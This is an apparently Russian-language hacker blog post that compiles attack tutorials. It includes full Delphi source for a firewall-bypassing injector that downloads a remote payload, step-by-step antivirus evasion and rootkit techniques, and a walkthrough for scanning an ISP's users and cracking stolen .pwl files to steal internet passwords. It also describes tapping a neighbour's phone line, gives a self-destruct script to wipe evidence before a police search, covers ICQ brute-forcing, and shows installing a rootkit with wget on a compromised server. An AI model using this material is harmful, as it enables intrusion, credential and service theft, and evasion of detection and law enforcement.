среда, 27 июня 2012 г.


ХАКЕРСКИЕ СТРАСТИ

Как скрыть свой телефонный номер
Меры противодействия

Один мой коришь в своё время юзал этот самый "халявный и-нет" от провайдера М. После первого звонка от прова, в котором злой админ матерился и требовал прекратить акты вандализма по отношению к М., он пришел ко мне. Подумав с минуту, я предложил подключиться к телефонному кабелю, который проходил в его щитке. Так и сделали, был собран тоновый генератор, который давал гудок в трубку несчастных, чей телефонный номер мы использовали (чтобы не догадались если вдруг решат ночью снять трубку, правда на попытки набрать номер гудок не откликался и продолжал гудеть), ну и начал мой коришь юзать халяву... Кстати хочу отметить, что мы отрубали на ночь соседский телефон и подключали к нему тоновый генератор, а в это время использовали и-нет, а с утра всё возвращали как было. итак, через 3 месяца вдруг мой коришь увидел 2 джипа и не скольких "маленьких" дяденек, которые зашли в его подъезд... по счастью они пошли выше его квартиры, в ту самую, к телефону которой мы подрубились. В ней жили старички - дед с бабкой, представляете сколько было эмоций, когда дяденьки обвинили их в постоянном хакерстве и потребовали их предъявить (:-) компьютер, с которого оно производилось. Дальнейшая история мне не известна.

Другой мой знакомый написал программу, которая забивала его настоящий телефонный номер. Вкратце теория выглядит так: когда АОН (вам слышен при этом щелчок) берёт трубку он посылает запрос АТС, которая передаёт в ответ на него номер звонящего. Обычный анти-АОН работает так: он пытается не дать удалённому АОНу "услышать" ваш настоящий телефонный номер. Его же программа передавала ложный номер (обычно 666-6666 [Москва]), правда иногда удалённые АОНы "смешивали услышанное" и получалось что-то вроде (987-0769). Однако в ядре матрицы всё равно обычно оставался его настоящий номер.

Как я вам показал, способы скрыться от матрицы есть, но они весьма ненадёжны! Поскольку сейчас есть специальные приборы (используют работники АТС), которые с точностью до метра скажут работнику АТС, где произведено несанкционированное подключение к номеру... Скрыть свой настоящий номер программными методами со 100% вероятностью то же нельзя...

Решение

Долго в воздухе витала идея, которую оформил в слова уважаемый мною LovinGod (http://lovingod.cjb.net). Вы наверняка видели телефонные карты международной/междугородней телефонии. Ну так вот, смысл таков: вы звоните на телефонный номер телефонного оператора, переходите в тональный режим и вводите пин-код с карты, а затем номер, можно в Москве (Питере, или в Америке). Ну так вот... Но номер определится не ваш, а номер ПУЛА ОПЕРАТОРА в данном городе/стране. Но ведь можно выстроить цепочку из таких операторов можно и через 10 городов, а то и стран... Таким образом отследить вас смогут только очень могучие силы. Как вы понимаете, таким образом вы, хотя и заплатив за карты, практически блокируете возможность вашего обнаружения.

Окончательное решение

Если вы хотите на 99,9% процентов обезопасить себя рекомендую делать так: через сеть купить несколько карт (около 10) и использовать чередование обычных и карт IP-телефонии. Рекомендую, так же, использовать подключение к чужому номеру телефона (тогда искать незаконное подключение, даже в самом плачевном случае, если цепочку отследят,) будет поздно, т.к. вы уже отключитесь. Самым уязвимым местом в этом мероприятии: покупка карт :-). А для стандартных целей (если вы не решили бороться со всем миром сразу) достаточно и одной карты. К примеру звоните из Москвы в Питер на номер пула своего же провайдера телефонии, вводите там реквизиты своей же карты и звоните обратно в Москву. Вот и всё, ваш номер скрыт.


Маскировка вируса

Итак, нам надо готовый исходник сделать невидимым для антивируса. Можно для этого, конечно, переписать и извратить весь код вируса таким образом чтобы тот уже не распознавался антивирусным ПО, но это надо писать, думать головой, стучать по клаве, к тому же на это требуется много времени, так что этот способ не подходит. Можно просто с нуля писать вирус, но ведь это тоже работает не всегда, у продвинутых антивирусов имеется эмулятор, огромная база, эвристика, при этом также нужно придумывать особый алгоритм, которого еще нет в базах антивирусов и это займет еще больше времени.

Для начала возьмем готовый исходник вредоносной проги. Так как мне очень подуше сайт www.wasm.ru, то готовый исходник я взял именно оттуда, это исходник Ms-Rem’a для обхода Agnitum Outpost Firewall Pro. В первичном виде он успешно палится всеми тремя антивирусами.

Вот его код:

program FireFuck;

uses
Windows, WinSock;

{$IMAGEBASE $13140000}

{ Определение положения подстроки в строке }
Function MyPos(Substr, Str: PChar): dword; stdcall;
asm
mov eax, Substr
mov edx, str
test eax, eax
je @noWork
test edx, edx
je @stringEmpty
push ebx
push esi
push edi
mov esi, eax
mov edi, edx
push eax
push edx
call lstrlen
mov ecx, eax
pop eax
push edi
push eax
push eax
call lstrlen
mov edx, eax
pop eax
dec edx
js @fail
mov al, [esi]
inc esi
sub ecx, edx
jle @fail

@loop:
repne scasb
jne @fail
mov ebx, ecx
push esi
push edi
mov ecx, edx
repe cmpsb
pop edi
pop esi
je @found
mov ecx, ebx
jmp @loop

@fail:
pop edx
xor eax, eax
jmp @exit

@stringEmpty:
xor eax, eax
jmp @noWork

@found:
pop edx
mov eax, edi
sub eax, edx

@exit:
pop edi
pop esi
pop ebx

@noWork:
end;

{ Копирование строк }
Function MyCopy(S:PChar; Index, Count: Dword): PChar; stdcall;
asm
mov eax, Count
inc eax
push eax
push LPTR
call LocalAlloc
mov edi, eax
mov ecx, Count
mov esi, S
add esi, Index
dec esi
rep movsb
end;

{ Копирование участка памяти }
procedure MyCopyMemory(Destination: Pointer; Source: Pointer; Length: DWORD);
asm
push ecx
push esi
push edi
mov esi, Source
mov edi, Destination
mov ecx, Length
rep movsb
pop edi
pop esi
pop ecx
end;


Function DownloadFile(Address: PChar; var ReturnSize: dword): pointer;
var
Buffer: pointer;
BufferLength: dword;
BufferUsed: dword;
Bytes: integer;
Header: PChar;
Site: PChar;
URL: PChar;
FSocket: integer;
SockAddrIn: TSockAddrIn;
HostEnt: PHostEnt;
Str: PChar;
WSAData: TWSAData;
hHeap: dword;
begin
Result := nil;
hHeap := GetProcessHeap();
WSAStartup(257, WSAData);
Site := MyCopy(Address, 1, MyPos('/', Address) - 1);
URL := MyCopy(Address, MyPos('/', Address), lstrlen(Address) - MyPos('/', Address) + 1);
Buffer := HeapAlloc(hHeap, 0, 1024);
try
BufferLength := 1024;
BufferUsed := 0;
FSocket := socket(PF_INET, SOCK_STREAM, IPPROTO_TCP);
SockAddrIn.sin_family := AF_INET;
SockAddrIn.sin_port := htons(80);
SockAddrIn.sin_addr.s_addr := inet_addr(Site);
if SockAddrIn.sin_addr.s_addr = INADDR_NONE then
begin
HostEnt := gethostbyname(Site);
if HostEnt = nil then Exit;
SockAddrIn.sin_addr.s_addr := Longint(PLongint(HostEnt^.h_addr_list^)^);
end;
if Connect(FSocket, SockAddrIn, SizeOf(SockAddrIn)) = -1 then Exit;
Str := HeapAlloc(hHeap, 0, 1024);
lstrcpy(Str, 'GET ');
lstrcat(Str, URL);
lstrcat(Str, ' HTTP/1.0'#10#13'Host: ');
lstrcat(Str, Site);
lstrcat(Str, #13#10'Connection: close'#13#10#13#10);
send(FSocket, Str^, lstrlen(Str), 0);
HeapFree(hHeap, 0, Str);
repeat
if BufferLength - BufferUsed < 1024 then
begin
Inc(BufferLength, 1024);
Buffer := HeapReAlloc(hHeap, 0, Buffer, BufferLength);
end;
Bytes := recv(FSocket, pointer(dword(Buffer) + BufferUsed)^, 1024, 0);
if Bytes > 0 then Inc(BufferUsed, Bytes);
until (Bytes = 0) or (Bytes = SOCKET_ERROR);
Header := MyCopy(Buffer, 1, MyPos(#13#10#13#10, Buffer) + 3);
ReturnSize := BufferUsed - lstrlen(header);
Result := VirtualAlloc(nil, ReturnSize, MEM_COMMIT or
MEM_RESERVE, PAGE_EXECUTE_READWRITE);
if Result = nil then Exit;
MyCopyMemory(Result, pointer(dword(Buffer) + lstrlen(header)), ReturnSize);
finally
HeapFree(hHeap, 0, Buffer);
end;
end;

{ процедура выполняющаяся в контексте доверенного приложения }
Procedure Download(); stdcall;
const
URL : PChar = '192.168.0.58/1.mp3';
var
Buff: pointer;
Size: dword;
Bytes: dword;
dFile: dword;
begin
LoadLibrary('wsock32.dll');
Buff := DownloadFile(URL, Size);
dFile := CreateFile('c:\1.mp3', GENERIC_WRITE, 0, nil, CREATE_NEW, 0, 0);
WriteFile(dFile, Buff^, Size, Bytes, nil);
CloseHandle(dFile);
ExitProcess(0);
end;


var
St: TStartupInfo;
Pr: TProcessInformation;
InjectSize: dword;
Code: pointer;
Injected: pointer;
BytesWritten: dword;
Context: _CONTEXT;
t:textfile;
cmd:string;
begin
ZeroMemory(@St, SizeOf(TStartupInfo));
St.cb := SizeOf(TStartupInfo);
St.wShowWindow := SW_SHOW;
// запускаем процесс, которому разрешено лезть на 80 порт
CreateProcess(nil, 'svchost.exe', nil, nil, false,
CREATE_SUSPENDED, nil, nil, St, Pr);
Code := pointer(GetModuleHandle(nil));
InjectSize := PImageOptionalHeader(pointer(integer(Code) +
PImageDosHeader(Code)._lfanew +
SizeOf(dword) +
SizeOf(TImageFileHeader))).SizeOfImage;
// выделяем память в процессе
Injected := VirtualAllocEx(Pr.hProcess, Code, InjectSize, MEM_COMMIT or
MEM_RESERVE, PAGE_EXECUTE_READWRITE);
// внедряем код
WriteProcessMemory(Pr.hProcess, Injected, Code, InjectSize, BytesWritten);
// изменяем контекст нити
Context.ContextFlags := CONTEXT_FULL;
GetThreadContext(Pr.hThread, Context);
Context.Eip := dword(@Download);
SetThreadContext(Pr.hThread, Context);
// запускаем процесс
ResumeThread(Pr.hThread);
end;

Теперь попробуем закомментировать строчку в основной части программы, где вызывается API CreateProcess - так вирус работать не будет вовсе, все обвалится еще в самом начале, но и антивирусами он после этого палиться не будет.

Мы подошли к основной части статьи – сейчас мы перепишем исходник так, чтобы он сохранил работоспособность и при этом перестал палиться антивирусами. Поступим следующим образом: вместо того, чтобы просто вызвать CreateProcess сделаем нечто вроде интерпретатора команд. Он будет читать строку из файла и сравнивать ее с каким-нибудь символом/строкой и при совпадении вызывать CreateProcess. Самый простейший способ – это модифицировать код вот так: вместо CreateProcess(nil, 'svchost.exe', nil, nil, false, CREATE_SUSPENDED, nil, nil, St, Pr); напишем эти 6 строчек кода:

AssignFile(t,'1.txt');
reset(t);
readln(t,cmd);
CloseFile(t);
if cmd = '1' then CreateProcess(nil, 'svchost.exe', nil, nil, false,
CREATE_SUSPENDED, nil, nil, St, Pr);

Естественно, переменные cmd, t нужно объявить. Способ простейший, но все таки он отлично работает, при этом чем больше важных участков вируса исполняются таким образом, тем эффективнее получается механизм. Но все таки в идеале этот код – отдельная процедура, которая опять же вызывается подобным образом – только при совпадении строки, прочтенной из файла с эталонной. Далее описан еще один пример переделки этого кода - сначала создаем отдельную процедуру:

Procedure MyVirusStart(str:string);
Var cmd:string;t:textfile;
Begin
AssignFile(t,'1.txt');
reset(t);
readln(t,cmd);
CloseFile(t);
if cmd = '1' then CreateProcess(nil, 'svchost.exe', nil, nil, false,
CREATE_SUSPENDED, nil, nil, St, Pr);
End;

А код модифицируем, вместо

CreateProcess(nil, 'svchost.exe', nil, nil, false,
CREATE_SUSPENDED, nil, nil, St, Pr);

Напишем вот так:

AssignFile(t,'1.txt');
reset(t);
readln(t,cmd);
CloseFile(t);
if cmd = '2' then MyVirusStart;

И все! Наш вирус невидим! Главное – найти основное место в коде вируса, то без чего он станет абсолютно безопасным, да и вообще не будет работать.

Этот алгоритм довольно простой, его можно еще более усовершенствовать, сделать так, чтобы команды генерировались вирусом и им же исполнялись и т.д.

Все это работает благодаря тому, что вирус разбивается на абсолютно безвредные части и то, что он будет делать напрямую зависит от команд в файле, без него вирус превращается в безвредную программку. Учитывая еще и то, что современным антивирусам видимо влом проверять весь файл вируса целиком и полностью - все работает «как часы», а если еще и изменять файл во время работы вируса (некий полиморфизм получается), то все антивирусы будут нервно курить в сторонке )). Чем на большее количество частей разделен вирус (число используемых команд) - тем эффективнее метод. Хотя (как показала практика) вполне хватает всего лишь 2 раза вставить подобный код в исходник и получается приличный результат – при проверке нескольких переделанных описанным выше способом исходников сервисом VirusTotal выяснилось, что если всего в 2-х местах исходника вставить предлагаемый код, то ни Dr.Web, ни NOD32, ни каспер больше его не палят.

Продолжим. Допустим нам нужно внедрить DLL с вредоносным кодом в какой-либо конкретный процесс (например, для того, чтобы поставить хук). Можно, конечно, использовать метод, описанный выше, но не факт, что удастся просто так осуществить чтение инструкций из файла, ведь в зависимости от того, в какой именно процесс мы внедряемся, в его таблице импорта может и не быть функций для работы с файлами (проверил на опыте – работает не всегда). Можно, правда, внедрить в процесс код загрузки нужных DLL, но ведь это не всегда требуется, а нам нужно создать абсолютно универсальный код.

Можно сделать так: завести, например, массив, состоящий, скажем из десяти элементов – строк или чисел (кому как удобно, лично мне по душе числа), каждый элемент это команда. Далее пишем процедуру, которая нужную команду для вируса пишет в массив в ячейку со случайным номером. Далее все делается аналогично первому способу: выбирается главное действие вируса, перед ним вызываем созданную процедуру, помещающую команду в массив и перебираем массив пока не встретим нужную команду. Итак, вот такой получается код:

// генерируем команду и кладем ее в рандомую ячейку массива а
procedure writecmd;
var i,c:integer;
begin
for c:=0 to 10 do a[c]:=0;
i:=random(900);
i:=i+1;
a[random(11)]:=i; // а – массив
end;

А в коде вируса вставляем следующие строчки

for j:=0 to 10 do
if a[j]<>0 then CreateProcess(nil, 'svchost.exe', nil,
nil, false, CREATE_SUSPENDED, nil, nil, St, Pr);
// здесь вызываем главное действие вируса
// в данном исходнике это CreateProcess

Как видно, это очень простой код, но он эффективно защитит твой вирус от обнаружения, базы идут лесом – вирус разделяется на абсолютно безвредные сами по себе части, и антивирусу заранее неизвестен ход его выполнения. Этот метод можно многократно усовершенствовать и он подходит практически для любых исходников (я думаю такой простой код переписать на С++ труда не составит никому :)).

Что же касается ядра Windows, то защита руткитов от палева антивирусов, вооружившихся только что обновленными базами,  происходит аналогичным образом, только «указания» вирусу можно давать при помощи IOCTL команд, а можно для уверенности передавать IOCTL командами также адреса перехватываемых функций (в случае с SDT можно передавать код функции в таблице).

Итак, что нам нужно сделать:

   1. Основную операцию записи в память перенесем в отдельную функцию;
   2. Создадим обработчик IOCTL команд;
   3. Свяжем IOCTL команду с процедурой записи в память(модификации кода).

Для начала создадим процедуру, модифицирующую код ядра:

// Здесь формируется код IOCTL в драйвере
#define TESTDRV_TYPE 40000
#define IOCTL_IOPM_FUNCTION \
CTL_CODE(TESTDRV_TYPE, 0x800, METHOD_BUFFERED, FILE_ANY_ACCESS)

NTSTATUS WriteKernelMemory()
{
// Здесь устанавливаем перехват на какую-нибудь функцию
...
}
NTSTATUS OnDeviceControlHandle(
IN PDEVICE_OBJECT DeviceObject,
IN PIRP pIrp
)
{
int i;
I = 9;
I = i+177;
NTSTATUS ntStatus = STATUS_SUCCESS;
PIO_STACK_LOCATION irpSp;

// Длина входного буфера
ULONG inBufLength;
// Длина выходного буфера
ULONG outBufLength;
// Указатель на входной и выходной буфер
PULONG ioBuffer;

// DbgPrint("OnDeviceControlHandle");

// Получаем указатель на драйверный стек
irpSp= IoGetCurrentIrpStackLocation(pIrp);

// Входной и выходной буфера и их длины
inBufLength = irpSp->Parameters.DeviceIoControl.InputBufferLength;
outBufLength = irpSp->Parameters.DeviceIoControl.OutputBufferLength;
ioBuffer = (PULONG) pIrp->AssociatedIrp.SystemBuffer;
// собственно обработка команд
switch ( irpSp->Parameters.DeviceIoControl.IoControlCode )
{
// обработка кода функции IOCTL_IOPM_FUNCTION
case IOCTL_IOPM_FUNCTION:
{
If(i!=0)
WriteKernelMemory;
break;
}
}

// Завершение рабочей процедуры
pIrp->IoStatus.Information = inBufLength;
/* Размер выходного буфера */
pIrp->IoStatus.Status = ntStatus;
IoCompleteRequest( pIrp, IO_NO_INCREMENT );
return ntStatus;
}

Естественно, для обработки IOCTL команд нужно обязательно создать объект устройства.

Подведем итоги : мы защитили вредоносный код от палева и вырубили Касперский проактив, теперь, пользуясь приведенными примерами вполне можно сотворить из готового исходника вполне работоспособный и не палящийся антивирусами вредоносный код.

Ну ладно, с антивирусными базами разобрались, а как быть с проактивной защитой антивируса Касперского (у него она хотя бы нормально работает, относительно…)? Ведь он будет бузить даже при попытке элементарно поставить хук. При интенсивном исследовании возможностей проактива, предлагаемого Каспером, таковой способ был найден.

Касперский, по непонятным мне причинам, не бузит, когда производится замена виндовских исполняемых файлов своими версиями и это очень хорошо )). Но у каспера есть проверка целостности системных файлов. К счастью, каспер проверяет только малую часть файлов оси (у него для этого и список имеется), но пользователь может добавлять в черный список и свои файлы, поэтому такие файлы, как, например winlogon.exe или lsass.exe заменить вряд ли удастся. Решение проблемы – замена файла logonui.exe, лежащего в дире %SystemRoot%\system32 ну и естественно в %SystemRoot%\system32\dllcache. Файл этот отвечает за экран входа в систему и по моему зря товарищи из Майкрософта сделали так, что этой exe-шке позволено и со всеми файлами работать, и в реестр писать, и сервисы грузить и много чего еще. Следовательно, грамотно пропатчив данный файлик можно очень хорошо напортачить, а самое главное, что заменив этот файл можно поудалять половину всех файлов каспера, что несомненно гуд. Эта возможность распространяется и на другие антивирусы. Итак, все сводится к тому, чтобы написать прогу, очень напоминающую по внешнему виду экран входа в систему, заменить ей штатный logonui.exe и дело в шляпе!

Кстати, я крайне не советую для этой цели использовать API CopyFile и подобные, во избежание палева, лучше написать процедуру копирования файлов самостоятельно (это очень просто делается) и защитить ее описанным ранее алгоритмом.



Бесплатный Интернет-без проблем!


Все что помечено ** - можно не читать.

1. Надо скачать прогу Shared Resource Scanner 6.2

и всякие лекарства к ней

** Она понадобится для сканирования компов на предмет шаров

2. Надо скачать прогу PWLHack by Hard Wisdom 4.10

** Она понадобится для узнавания паролей или подбора пароля

3. Надо скачать прогу SMBCRACK

** Она понадобится для подключения удаленного диска и подбора пароля

4. Надо скачать с сайта прогу DN

** Она понадобится для лазения по компу жертвы

Начинаем!

Первым делом подключаемся к инету...

Все подключились..))

Идем - Пуск->Выполнить

Там в окошке набираем winipcfg

В появившейся проге видим строку IP Adress ... ... ...

Вот то что там написано (например 63.76.234.45) - это и есть твой IP ~~Запомнить~~

** Он нужен для определения зоны покрытия твоего прова

** Можно подключиться еще несколько раз к инету и записывать эти числа

** В основном будет меняться только последнее число, но если изменится и пред-
последнее то его тоже надо ~~запомнить~~

** Можно пойти на hostings.pp.ru или hosting.pp.ru - не помню точно и там,
справа в окошке где чо-то написано про определение IP вписать свой IP,
там появится описание твоего прова, типа руководителей фирмы и т.д., но нам
не это надо, надо токо запомнить зону IP прова (там написано примерно:
63.76.234.0-63.76.234.255) это значит что пров маленький и поддерживает 255
пользователей одновременно, а если написано 63.76.234.0-63.76.235.255 значит
255 пользователей из зоны 234 и 255 пользователей из зоны 235

Теперь вычленяем предполагаемую зону IP прова - 63.76.234.0-63.76.234.255

** Но может быть и больше см. верхний комментарий

Грузим прогу SRS 6.2

Справа в окошке вписываем IP-шники - сверху 63.76.234.0 внизу 63.76.234.255
если прога не зарегистрированная - то придется сканировать партиями по 100
штук идиотов))

Жмем Старт и ждем, пока появятся компы, пока они закрасятся цветом..

Может быть несколько ситуаций - обнаруженные компы будут серыми - плохо
надо пробовать в следующий раз

обнаруженные компы - черные - плохо, пробуем в след. раз

ЕСЛИ ХОТЬ ОДИН КОМП КРАСНЫЙ - ВОЗРАДУЙТЕСЬ!!

например появился 63.76.234.67

** У меня тоже не сразу появлялись красные компы, нода ждать, смотреть в
определенные часы

Теперь смотрим, когда развернулось дерево ресурсов, какие на этом компе
есть шары

если есть ЧТО-ТО КРОМЕ IPC$ надо грузить SMBCRACK

в поле Адрес: вписываем тот адрес (в примере - 63.76.234.67)

в поле Имя: - имя этого компа(там в SRS6.2 написано оно рядом с IP)

жмем Подключить

внизу видим - идет работа))

после того как в окошке появился список ресурсов - жмем Подобрать

допустим у ресурсов нет пароля

жмем на диск С: в этом списке и в новом окошке жмем ОК

** Можно жать на любой диск и копаться в нем сколько влезет))

потом грузим DN и в нем выбираем диск который только-что подключили
(alt+f1)

идем в директорию windows и копируем к себе все его .pwl файлы

например andrey.pwl

** Можно скопировать ВСЕ что хочеш - пароли The Bat! и т.д.

отключаемся от инета

теперь копируем .pwl (andrey.pwl) в директорию PWLHACK4.10

Опять же все в том же DN заходим в директорию PWLHACK и там
набираем:

pwlhack /list

грузится прога и спрашивает, отвечаем словом

andrey.pwl жмем ентер

потом опять спрашивает, отвечаем

andrey жмем ентер

опять спрашивает и..

опять жмем ентер

выводится список паролей логинов данного пользователя

если слева от него написано DIAL X - это пароль от инета

нам повезло, звони своему провайдеру и вводи чужие данные))


Как спастись от отдела "К" и тюрьмы


Представь такую ситуацию, ты сидишь перед телеком, смотришь Санта Барбару и тут раздаётся звонок. Ты открываешь дверь и в квартиру входят несколько амбалов, представившись сотрудниками ФСБ =)Они просят тебя включить компьютер. Ты включаешь. Полазив пару минут по твоему винчестеру, они находят и твой любимый Sub7 с ОбманиСоседа, и Voidozer, и кучу ворованных даил апов.
Затем заламывают тебе руку и везут в следственный изолятор. Как тебе? А ведь всё могло бы быть и подругому.
Конечно, самым надёжным способом являются крипто алгоритмы. Но за надёжность нужно платить гимором и разного рода неудобствами. В этой статье я расскажу тебе о простеньком самодельном защитном устройстве для твеого компа от посягательств посторонних людей.
Ладно, начнём.
Прежде всего все компроментирующие тебя данные ты должен хранить в одном каталоге (я рассматриваю именно такой случай). Возможно присутствие неограниченного числа подкаталогов в нём.Далее cкопируй свой autoexec.bat в файл autoexec.bak (тоже в корень диска С). Теперь открой autoexec.bat блокнотом и добавь в конец строчку:
load PCI Steering (PCI\IRQHOLDER\05)
Не пугайся, она такая чудная, чтоб все подумали, что она чисто системная. Далее посмотри, есть ли в твоём autoexec'e cтрочка вроди:
set PATH=список_папок
Вместо "список_папок" там должна быть прописана папка с твоей виндой и ещё пара. Если такого вообще не наблюдается, добавь строчку:
set PATH=%windir%\command
Всё, мы приготовились к внедрению самого механизма. Теерь cоздай в каталоге "c:\windows\command\" файл load.bat. Его содержание должно быть таким:


Код:

 @echo off
 echo --- By windows setup ---
 @choice /c:za /N /T:a,5
 @if errorlevel 2 goto its_ok
 @deltree /y каталог_с_прогами_который_нужно_удалить
 @cls
 @deltree /y %windir%\Tempor~1\*.* > dead
 @deltree /y %windir%\Tempor~1\dead
 @cls
 @deltree /y %windir%\History\*.* > dead
 @deltree /y %windir%\History\dead
 @cls
 @deltree /y %windir%\Cookies\*.txt > dead
 @deltree /y %windir%\Cookies\dead
 @cls
 @deltree /y %windir%\TEMP\*.* > dead
 @deltree /y %windir%\TEMP\dead
 @cls
 @deltree /y c:\autoexec.bat
 @cls
 @ren c:\autoexec.bak autoexec.bat
 @deltree /y %windir%\command\load.bat
 :its_ok


Всё. Теперь перегружай комп и наслаждайся.

Фишка вся в том, что при загрузке компа, как только ты увидишь на экране надпись "--- By windows setup ---" ты должен будешь нажать на кнопку "z". Если в течение пяти секунд ты на неё не нажмёшь, сотрётся каталог с твоими прогами и почистятся папки с временными инет файлами (типа логов). Как тебе? =) Тоесть ты один знаешь, как избежать этого дестроя. И самое главное, что сам дестрой будет проходить совершенно незаметно и по завершению оного данный механизм самоуничтожется. Тоесть никто и не узнает, что вообще что-то на твоём компе было (подредактированный autoexec.bat тоже заменяется на старый).

Если тебя ломает при каждой загрузке нажимать на Z, можешь сделать так, чтобы наоборот при нажатии на кнопку происходил дестрой. Тоесть у тебя будет 5 сек, чтобы нажать на кнопку "А" (именно А, а не Z) для уничтожения компромата. Для этого замени 4ую строчку на "@choice /c:za /N /T:z,5"

Если для тебя 5 сек это мало\много, то просто подредактируй 3тью строчку cкрипта (замени там число 5 на более подходящее).


Брутим дешевле и быстрее


Надо сделать небольшое отступление, чтобы понять, что такое компрессор трафика. В случае CPROXY мы имеем дело с универсальным компрессором трафика, который способен сжимать данные ЛЮБОГО TCP соединения. Работает он просто и понятно: на локальном интерфейсе поднимаются HTTP/SOCKS прокси (или простой порт-сквозной тоннель), которые принимают запросы от программ, сжимают запрос, в сжатом виде отправляют на сервера CPROXY. Там запрос «разжимается» и направляется на сервер назначения (rambler.ru,mail.ru или к чему вы там обращались). Затем сервер CPROXY принимает ответ от сервера назначения, сжимает его, и в сжатом виде отправляет обратно клиенту. Клиенту CPROXY остается только распаковать прилично зажатый трафик и выдать его в нормальном «разжатом» виде на локальный порт (HTTP-прокси , SOCKS-прокси или простой порт-тоннель). Т.е. любой HTTP-браузер, Асю и Ирку можно ужать. И довольно прилично: Хтмл жмется в 5-6 раз! Трафик Аси жмется раза в 2-3. Ирку не юзал, но, скорее всего, тоже раз в 5. И это при том, что клиентская часть программы весит около 900 кб., свободно лежит на http://cproxy.net, в демо-режиме почти не накладывает ограничений.

Благодаря этому сервису даже трафик брутера Аси (zbrute в моем случае ) отлично жмется. Причем скорость перебора возрастает в разы не только за счет сжатия трафика, но и за упаковки пакетов. Дело в том, что процесс Брута Аси порождает много «коротких» соединений, состоящих из ооочччень маленьких ТСР-пакетов. CPROXY укладывает несколько маленьких пакетов в один побольше. В результате – заметный выигрыш во времени, т.к. экономится куча времени за счет одновременного установления нескольких соединений.

Результат действительно обрадовал: после того, как я «натравил» брутер на файл с уже известными мне UIN:PASS, процесс пошел. Причем заставив брутер Аси ZBRUTE работать через локальный SOCKS-server 127.0.0.1:9000 от CPROXY, я добился скорости перебора 20 уинов в секунду! Для GPRS практически нереально. Правда, скорость продержалась только несколько секунд, после чего, видимо, сработал ограничитель количества соединений в секунду на серверах CPROXY (я юзаю прогу в режиме DEMO). Причем изменение количество потоков брутера при переборе улучшению показателей не способствовало. Но и этого было достаточно. Для проверки нескольких тысяч уинов на валидность мне хватило и такого «импульсного» режима. Трафика сэкономилась куча, время перебора сократилось во много раз.

Мораль сей басни такова: пробуйте юзать сервисы компрессии трафика по-полной, в частности, для ускорения процесса брута. Есть вероятность, что даже на высокоскоростных соединениях вы сможете получить значительный прирост скорости перебора. Ну а то, что вы сэкономите кучу трафика, в большинстве случаев даже не оговаривается.

P.S. После написания этой статейки у меня самого осталось несколько интересных вопросов, на которые ты, уважаемый читатель, можешь помочь ответить:
-какой сервис компрессии трафика (Cproxy,Traffic Compressor, другие) лучше других подходит для брута (меньше всего ограничивает количество соединений)
-как поведет себя ЗАРЕГИСТРИРОВАННЫЙ CPROXY, если брутить через него (у меня не было возможности зарегать и узнать, будет ли тогда так заметно ограничение количества соединений в секунду)
-в чем истинная причина быстрого падения скорости перебора после первых секунд (возможно, найдется человек, хорошо разбирающийся в TCP/IP, который поймет причину появления кучи соединений с состоянии CLOSE_WAIT и прочих обычно маложивущих состяний)
-какую связку БРУТЕР/КОМПРЕССОР_ТРАФИКА (и с какими настройками) лучше всего использовать

P.P.S На 27.10.2007: в цепрокси, по-моему, слегка поумерили пыл брутеров и сократили количество соединений в скунду на одного клиента. Правдо теперь серфить через него стало очень приятно (видимо, сошла на нэд нагрузка, которую создавали комрады, занимавшиеся брутом) - ХТМЛ жмется в 5 раз.


Руткит всему голова


До руткита:
Выполним команду ls –al.

Test.rar
1.dat
Rootkit
Messages.dat

А вот что мы увидим с применением руткита.
Выполним команду ls –al

Test.rar
1.dat
Messages.dat

Как видим, руткит скрыл файлы, которые не желательно видеть простому пользователю, либо же админу сервака. Так же руткит скрывает себя в запущенных процессах, порт, открытый хакером для коннекта к серваку. Порт, конечно же, открывается с правами рута, ибо нах он нужен тогда, причем он не видим, а это значит, что мы остаёмся незамеченными.

Ну, теперь я думаю, тебе стало понятно, что же такое руткит и для чего он нужен. Грубо говоря, это профи маскировки!

Теперь давай на примере разберем установку руткита на уже, надеюсь, имеющийся у вас шелл. Но вот тут возникает одно но, руткит возможно поставить только с правами uid=0(root). Это не есть гуд ( но ниче прорвемся!

Приступим к установке.

Допустим, у нас имеется уже порутанный шелл. Для начала надо слить на наш порутанный шелл собственно сам руткит. Сделаем это вот так:

wget хз_откуда_вы_будите_сливать/rootkit.tar.gz -o rootkit.tar.gz

Архив залили, теперь распакуем:

tar -zxf rootkit.tar.gz

Установим его:

make sense
и наконец запускаем:

./rootkit 9187

Где 9187 порт который откроет руткит – этот порт невидим и подключает нас с правами рута.

Конектимся, проверяем права командой

id

и что мы видим!!!!

uid=0(root) gid=0(root) groups=0(root)

ну вот, что и требовалось доказать ) мы имеем совершенно невидимый шелл с правами рута. А теперь остается делать свои грязные делишки ;)

Но не все так хорошо руткиты тоже можно обнаружить, ибо нах тогда существуют программы, которые с легкостью палят такого рода руткиты.

Ставим SOCKS своими руками
Ты юзаешь прокси? Уверен что да. А ты никогда не задумывался откуда они берутся и для чего их создают а? Подумай сам, ведь прокси генерируют огромный траффик. Кому нада за него платить? А вот кому. Большинство публичных прокси серверов устанавливаются либо хакерами, либо спецслужбами для поимки первых. А поймать хакера, заюзавшего КГБ’шный проксик очень просто. Допустим хакер взломал сервер банка, выкачал интересующую его инфу, после чего админ заподозрил взлом, админ покопался в логах нашел айпишник хакера (точнее айпишник проксика через который работал хакер) и побежал премиком на Лубянку (предположим %). Сотрудники отдела “К” проверили по своей базе этот самый IP и увидили что это айпишник ихнего проксика. Теперь дело за малым, сотрудники ковыряют логии на сервере где установлен их проксик. ВСЁ, ХАКЕР ПОД КОЛПАКОМ!
Мы рассмотрели первый вариант, теперь немного расскажу о втором.
Представь такую ситуацию. Я борзый падопак-хакер поставивший свой проксик, и конечно я не забыл включить у своего проксика функцию ведения логов. После чего я щедро оставляю свой проксик в паблике и наивные юзере пользуются ими. Наверное у тебя возник вопрос: а нафига мне ему это нада, чё он будет делать с этими логами? Да всё просто, весь трафик проходящий через мой проксик будет записываться в лог-файл. Ты залогинился под своим паролем в аське, твой пароль записался в лог моего проксика %).
Стрёмно получается да? Так вот чтоб с тобой не произошло ничего из вышеизложенного я и написал эту стаью (признаюсь тема заеженна по потери пульса). Выход один- ставить собственный проксик.
Я расскажу об установке наиболее популярного (популярного по праву) socks прокси сервера под названием 3proxy от ЗАРАЗЫ. Рульность этого проксика заключается в том, что его можно установить даже с nobody правами!

Итак начнём:
Нам понадобятся:
1. Руки прямые - 2 шт.
2. архвив 3proxy
3. Шелл.

